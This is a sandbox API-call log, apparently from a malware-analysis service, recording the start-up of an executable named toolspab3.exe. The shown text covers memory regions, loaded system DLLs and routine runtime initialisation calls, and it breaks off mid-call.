# Flog Txt Version 1 # Analyzer Version: 4.4.0 # Analyzer Build Date: Dec 8 2021 20:04:45 # Log Creation Date: 27.12.2021 22:08:38.860 Process: id = "1" image_name = "toolspab3.exe" filename = "c:\\users\\keecfmwgj\\desktop\\toolspab3.exe" page_root = "0x469c5000" os_pid = "0xe44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x390" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 112 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 113 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 114 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 115 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 116 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 117 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 118 start_va = 0x400000 end_va = 0x4d3fff monitored = 1 entry_point = 0x423db0 region_type = mapped_file name = "toolspab3.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\toolspab3.exe") Region: id = 119 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 120 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 121 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 122 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 123 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 124 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 125 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 126 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 127 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 267 start_va = 0x380000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 268 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 269 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 270 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 271 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 272 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 273 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 274 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 275 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 276 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 277 start_va = 0x4e0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 278 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 279 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 280 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 281 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 282 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 283 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 284 start_va = 0x7c0000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 285 start_va = 0x9b0000 end_va = 0xdbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 286 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 287 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 288 start_va = 0x20000 end_va = 0x28fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 289 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 290 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 291 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 292 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 293 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 294 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 295 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 296 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 297 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 298 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 299 start_va = 0x210000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 300 start_va = 0x210000 end_va = 0x22dfff monitored = 0 entry_point = 0x22158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 301 start_va = 0x230000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 302 start_va = 0x4e0000 end_va = 0x667fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 303 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 304 start_va = 0x210000 end_va = 0x22dfff monitored = 0 entry_point = 0x22158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 305 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 306 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 307 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 308 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 309 start_va = 0x7c0000 end_va = 0x940fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 310 start_va = 0x9a0000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 311 start_va = 0x9b0000 end_va = 0x1daffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 312 start_va = 0x74430000 end_va = 0x744affff monitored = 0 entry_point = 0x744437c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 313 start_va = 0x240000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 314 start_va = 0x1db0000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001db0000" filename = "" Region: id = 315 start_va = 0x743c0000 end_va = 0x743d2fff monitored = 0 entry_point = 0x743c1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 316 start_va = 0x220000 end_va = 0x222fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 317 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Thread: id = 1 os_tid = 0xe48 [0057.573] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x6c85bfb0, dwHighDateTime=0x1d7fb6e)) [0057.573] GetCurrentProcessId () returned 0xe44 [0057.573] GetCurrentThreadId () returned 0xe48 [0057.573] GetTickCount () returned 0x1d3a8c6 [0057.573] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff68 | out: lpPerformanceCount=0x18ff68*=3078124439526) returned 1 [0057.609] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff80, hStdError=0x42c778)) [0057.610] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0057.610] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x9a0000 [0057.611] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0057.611] GetProcAddress (hModule=0x769b0000, lpProcName="FlsAlloc") returned 0x769c4ee3 [0057.611] GetProcAddress (hModule=0x769b0000, lpProcName="FlsGetValue") returned 0x769c1252 [0057.611] GetProcAddress (hModule=0x769b0000, lpProcName="FlsSetValue") returned 0x769c41c0 [0057.611] GetProcAddress (hModule=0x769b0000, lpProcName="FlsFree") returned 0x769c354f [0057.613] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x238) returned 0x9a07d0 [0057.613] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0057.613] GetCurrentThreadId () returned 0xe48 [0057.613] GetStartupInfoW (in: lpStartupInfo=0x18fea8 | out: lpStartupInfo=0x18fea8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x9a07f0, hStdOutput=0x429b74, hStdError=0x0)) [0057.613] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x824) returned 0x9a0a10 [0057.614] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0057.614] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0057.614] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0057.614] SetHandleCount (uNumber=0x20) returned 0x20 [0057.614] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe\" " [0057.614] GetEnvironmentStringsW () returned 0x6cee10* [0057.614] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0xb32) returned 0x9a1240 [0057.614] FreeEnvironmentStringsW (penv=0x6cee10) returned 1 [0057.614] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c5868, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\toolspab3.exe")) returned 0x28 [0057.614] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x7e) returned 0x9a1d80 [0057.614] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0xbc) returned 0x9a1e08 [0057.614] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x62) returned 0x9a1ed0 [0057.614] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x7a) returned 0x9a1f40 [0057.615] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x92) returned 0x9a1fc8 [0057.615] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x9c) returned 0x9a2068 [0057.615] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x86) returned 0x9a2110 [0057.615] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x54) returned 0x9a21a0 [0057.615] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x6c) returned 0x9a2200 [0057.615] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x4c) returned 0x9a2278 [0057.615] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x3e) returned 0x9a22d0 [0057.615] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x58) returned 0x9a2318 [0057.615] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x80) returned 0x9a2378 [0057.615] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x56) returned 0x9a2400 [0057.615] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x52) returned 0x9a2460 [0057.615] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x40) returned 0x9a24c0 [0057.616] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x14e) returned 0x9a2508 [0057.616] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0xa0) returned 0x9a2660 [0057.616] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x5a) returned 0x9a2708 [0057.616] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x5e) returned 0x9a2770 [0057.616] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0xb4) returned 0x9a27d8 [0057.616] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x48) returned 0x9a2898 [0057.616] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x54) returned 0x9a28e8 [0057.616] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x5a) returned 0x9a2948 [0057.616] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x6c) returned 0x9a29b0 [0057.616] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x76) returned 0x9a2a28 [0057.616] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x60) returned 0x9a2aa8 [0057.616] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0xfa) returned 0x9a2b10 [0057.616] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x52) returned 0x9a2c18 [0057.616] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x42) returned 0x9a2c78 [0057.617] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x50) returned 0x9a2cc8 [0057.617] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x78) returned 0x9a2d20 [0057.617] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x76) returned 0x9a2da0 [0057.617] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x50) returned 0x9a2e20 [0057.617] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x4a) returned 0x9a2e78 [0057.617] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x62) returned 0x9a2ed0 [0057.617] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x48) returned 0x9a2f40 [0057.617] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x54) returned 0x9a2f90 [0057.617] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0xb0) returned 0x9a2ff0 [0057.617] HeapValidate (hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a1240) returned 1 [0057.631] HeapFree (in: hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a1240 | out: hHeap=0x9a0000) returned 1 [0057.632] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0xa4) returned 0x9a1240 [0057.632] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0057.632] GetLastError () returned 0x0 [0057.632] SetLastError (dwErrCode=0x0) [0057.632] GetLastError () returned 0x0 [0057.632] SetLastError (dwErrCode=0x0) [0057.633] GetLastError () returned 0x0 [0057.633] SetLastError (dwErrCode=0x0) [0057.633] GetACP () returned 0x4e4 [0057.633] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x244) returned 0x9a12f0 [0057.633] GetLastError () returned 0x0 [0057.633] SetLastError (dwErrCode=0x0) [0057.633] IsValidCodePage (CodePage=0x4e4) returned 1 [0057.633] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe50 | out: lpCPInfo=0x18fe50) returned 1 [0057.633] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f914 | out: lpCPInfo=0x18f914) returned 1 [0057.633] GetLastError () returned 0x0 [0057.633] SetLastError (dwErrCode=0x0) [0057.633] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0057.634] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x22c) returned 0x9a1540 [0057.634] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0x9a1568, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\㷝훈\臘") returned 256 [0057.634] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\㷝훈\臘", cchSrc=256, lpCharType=0x18fc34 | out: lpCharType=0x18fc34) returned 1 [0057.634] HeapValidate (hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a1540) returned 1 [0057.634] HeapFree (in: hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a1540 | out: hHeap=0x9a0000) returned 1 [0057.635] GetLastError () returned 0x0 [0057.635] SetLastError (dwErrCode=0x0) [0057.635] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0057.635] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x22c) returned 0x9a1540 [0057.635] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0x9a1568, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\㷝훈\臘") returned 256 [0057.636] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\㷝훈\臘", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0057.636] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x22c) returned 0x9a1778 [0057.636] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\믝퟈\臘ఀᕀ\x9a", cchSrc=256, lpDestStr=0x9a17a0, cchDest=256 | out: lpDestStr=" 